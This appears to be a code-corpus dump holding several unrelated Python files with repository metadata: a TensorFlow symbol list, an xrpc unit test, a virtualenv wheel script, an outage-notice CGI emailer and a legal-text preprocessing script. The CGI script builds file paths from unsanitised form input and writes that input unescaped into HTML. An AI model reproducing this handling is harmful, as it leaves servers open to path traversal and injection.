# pylint: enable=unused-import,line-too-long,wildcard-import
_allowed_symbols = [
"SequenceDict",
"setdefault",
"tensors_to_column",
"column_to_tensors",
"kronecker_product",
"layer_params_to_mat2d",
"mat2d_to_layer_params",
"compute_pi",
"posdef_inv",
"posdef_inv_matrix_inverse",
"posdef_inv_cholesky",
"posdef_inv_funcs",
"SubGraph",
"generate_random_signs",
"fwd_gradients",
]
remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
| [
"ryfeus@gmail.com"
] | ryfeus@gmail.com |
396c94f3cc267a2427d8631410da750806a52241 | ecfc473acd6dc4a6ccf401b64a2eee227b056a9e | /xrpc_tests/test_dict.py | 35d2e574b6fb13a34128c860af07da8509b72157 | [
"Apache-2.0"
] | permissive | andreycizov/python-xrpc | 774cb2a433a86d83cc55d92b7c4d0c0d6780577b | ed403ae74d5e89e0ebac68bcc58591d6b32742ff | refs/heads/master | 2020-03-22T13:48:03.024609 | 2019-08-07T11:33:19 | 2019-08-07T11:33:19 | 140,132,337 | 0 | 0 | Apache-2.0 | 2018-07-09T01:53:08 | 2018-07-08T02:46:45 | Python | UTF-8 | Python | false | false | 895 | py | import unittest
from datetime import timedelta
from xrpc.dict import RPCLogDict, ObjectDict
from xrpc.error import HorizonPassedError
from xrpc.net import RPCKey
from xrpc.util import time_now
class TestDict(unittest.TestCase):
def test_rpclogdict(self):
cr = time_now()
x = RPCLogDict(cr)
with self.subTest('a'):
with self.assertRaises(HorizonPassedError):
x[RPCKey(time_now() - timedelta(seconds=10))] = False
kv = RPCKey()
with self.subTest('b'):
val = True
x[kv] = val
self.assertEqual(x[kv], val)
with self.subTest('c'):
x.set_horizon(time_now())
with self.assertRaises(HorizonPassedError):
x[kv]
def test_object_dict(self):
v = ObjectDict()
with self.assertRaises(AttributeError):
v.attr | [
"acizov@gmail.com"
] | acizov@gmail.com |
86162c2e3044c4991f3146946be6253becc800fc | d8913c1512146bb42756f61ba0872d73179884eb | /env/bin/wheel3 | 6c5a912cdabbfbc51374fb893594f592a6266ee5 | [
"MIT"
] | permissive | sahin88/Django_Rest_Framework_Redux_React_Estate_App_FullStack | 2ed305c399edfab05ce3653e8bcaf36f09ae9015 | 10e31c4071bcebc0e4401f42084211d170b2ea56 | refs/heads/main | 2023-03-22T17:00:37.102265 | 2021-03-16T17:26:53 | 2021-03-16T17:26:53 | 319,297,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | #!/home/alex/Documents/estate/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"sahinmuratogur@gmail.com"
] | sahinmuratogur@gmail.com | |
c1ec56c62be7e95389e3aeb7ad30f6794d553aba | a1b892c0f5f8c5aa2c67b555b8d1d4b7727a86a4 | /Python/outage/edit_update.py | f28d19d183c03af4d7ba848164e4bf291788d408 | [] | no_license | Vivekdjango/outage | 60f463ae5294d2b33544a19bda34cc2c22dd42c8 | 20cfbc07e6714f0c8c7e685ea389f1b8ef1bfd53 | refs/heads/master | 2021-01-20T04:18:40.023340 | 2017-04-28T06:46:26 | 2017-04-28T06:46:26 | 89,675,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,475 | py | #!/usr/bin/python
print "Content-Type: text/html"
print ""
import cgi, cgitb
import re
import smtplib
import codecs
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
form=cgi.FieldStorage()
st=form.getvalue('status')
sub=form.getvalue('subject')
com=form.getvalue('comment')
print com
cm=com.split('\n')
print cm
check=re.search("Communication(.*)",sub)
new=check.group()
i=new.split()
x=i.remove('Communication')
j=' '.join(i).replace(" ","")
html_file=j+'.html'
m=open('/var/www/html/outage/%s'%(html_file),'r+')
o=m.readlines()
m.seek(0)
for i in o:
if i !="<b>ETA:</b>NA<br><br>Regards & Thanks<br>NOC":
m.write(i)
m.truncate()
m.close()
s=open("/var/www/html/outage/%s"%(html_file)).read()
z=re.search('style(.*)',s)
x=z.group()
if st=="amber" and x=="style='color:red'><b><u>Status:</u></b>RED</p>":
s=s.replace(x,"style='color:orange'><b><u>Status:</u></b>AMBER</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="amber" and x=="style='color:green'><b><u>Status:</u></b>GREEN</p>":
s=s.replace(x,"style='color:orange'><b><u>Status:</u></b>AMBER</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="resolved" and x=="style='color:red'><b><u>Status:</u></b>RED</p>":
s=s.replace(x,"style='color:green'><b><u>Status:</u></b>GREEN</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="resolved" and x=="style='color:orange'><b><u>Status:</u></b>AMBER</p>":
s=s.replace(x,"style='color:green'><b><u>Status:</u></b>GREEN</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="red" and x=="style='color:orange'><b><u>Status:</u></b>AMBER</p>":
s=s.replace(x,"style='color:red'><b><u>Status:</u></b>RED</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="red" and x=="style='color:green'><b><u>Status:</u></b>GREEN</p>":
s=s.replace(x,"style='color:red'><b><u>Status:</u></b>RED</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
#with open("/var/www/html/outage/%s"%html_file, "r") as f:
# lines = f.readlines()
#for index, line in enumerate(lines):
# if line.startswith("ETA \n"):
# break
#lines.insert(index, "<br><ul><li>{0}</li></ul>".format(com))
#
l=[]
for v in cm:
val="<ul><li>%s</li></ul>"%(v)
l.append(val)
print l
#print l.remove('<ul><li>\r</li></ul>')
#val="<br><ul><li>{0}</li></ul>".format(com)
foot="<b>ETA:</b>NA<br><br>Regards & Thanks<br>NOC"
with open("/var/www/html/outage/%s"%html_file, "a") as f:
for ca in l:
f.writelines(ca)
f.write('\n')
f.write('\n')
f.write(foot)
f.close()
ab=codecs.open('/var/www/html/outage/%s'%html_file)
bc=ab.read()
def py_mail(SUBJECT, BODY, TO, FROM):
MESSAGE = MIMEMultipart('alternative')
MESSAGE['subject'] = SUBJECT
MESSAGE['To'] = TO
MESSAGE['From'] = FROM
HTML_BODY = MIMEText(BODY, 'html')
MESSAGE.attach(HTML_BODY)
server = smtplib.SMTP('<mail server>')
server.sendmail(FROM, [TO], MESSAGE.as_string())
server.quit()
if __name__ == "__main__":
"""Executes if the script is run as main script (for testing purposes)"""
email_content =bc
FROM = '<sender email-id>'
TO ='<receiver1>'
py_mail(sub, email_content, TO, FROM)
| [
"viveksinha@IC0532-L0.corp.inmobi.com"
] | viveksinha@IC0532-L0.corp.inmobi.com |
04481067cae2cdf914133af49338265cf8615ad1 | b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a | /CAIL2020/sfzyzc/sfzyzb/preprocess.py | 90d05468cc6b241abae61ba2d175fe7a69e29aed | [
"Apache-2.0"
] | permissive | Tulpen/CAIL | d6ca9981c7ea2603ae61675ba330a9614cd9398d | c4cfa98ab4ecedbce34a7a5a186830486047540c | refs/heads/master | 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | import json
import re
from difflib import SequenceMatcher
from query_sim import Query_Similar
import pandas
smallfile = "data/sfzy_small.json"
bigfile = "data/sfzy_big.json"
interfile = "data/inter.json"
# threshold = 0.3
def process_context(line):
spans = re.split('([,,:;;。])', line)
spans = [span for span in spans if len(span)>0]
spans_sep = []
for i in range(len(spans)//2):
spans_sep.append(spans[2*i]+spans[2*i+1])
if len(spans_sep) == 0:
return []
return spans_sep
# with open(interfile, 'w', encoding='utf-8') as fw:
# with open(smallfile,'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# pos = []
# neg = []
# summary = sents['summary']
# text = sents['text']
# sentences = [item['sentence'] for item in text]
# summary_spans = process_context(summary)
# query_sim = Query_Similar(sentences)
# matching_ids = [query_sim.find_similar(span) for span in summary_spans]
# pos = [sentences[i] for i in range(len(sentences)) if i in matching_ids]
# neg = [sentences[i] for i in range(len(sentences)) if i not in matching_ids]
# sents['pos'] = pos
# sents['neg'] = neg
# print('.')
# fw.write(json.dumps(sents, ensure_ascii=False)+"\n")
#
# with open(bigfile,'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# pos = []
# neg = []
# summary = sents['summary']
# text = sents['text']
# sentences = [item['sentence'] for item in text]
# summary_spans = process_context(summary)
# query_sim = Query_Similar(sentences)
# matching_ids = [query_sim.find_similar(span) for span in summary_spans]
# pos = [sentences[i] for i in range(len(sentences)) if i in matching_ids]
# neg = [sentences[i] for i in range(len(sentences)) if i not in matching_ids]
# sents['pos'] = pos
# sents['neg'] = neg
# print('.')
# fw.write(json.dumps(sents, ensure_ascii=False)+"\n")
tag_sents = []
para_id=0
with open(smallfile, 'r', encoding='utf-8') as fin:
for line in fin:
print('.')
sents = json.loads(line.strip())
for sent in sents:
tag_sents.append((para_id,sent))
para_id += 1
df = pandas.DataFrame(tag_sents, columns=['para','content'])
df.to_csv("data/para_content_train.csv", columns=['para','content'], index=False)
#
# # df = pandas.DataFrame()
# tag_sents = []
# with open(interfile, 'r', encoding='utf-8') as fin:
# for line in fin:
# print('.')
# sents = json.loads(line.strip())
# tag_sents.append(("".join(sents['pos']), sents['summary']))
# df = pandas.DataFrame(tag_sents, columns=['core', 'summary'])
# df.to_csv("data/core_summary_train.csv", columns=['core','summary'], index=False) | [
"bangtech@sina.com"
] | bangtech@sina.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.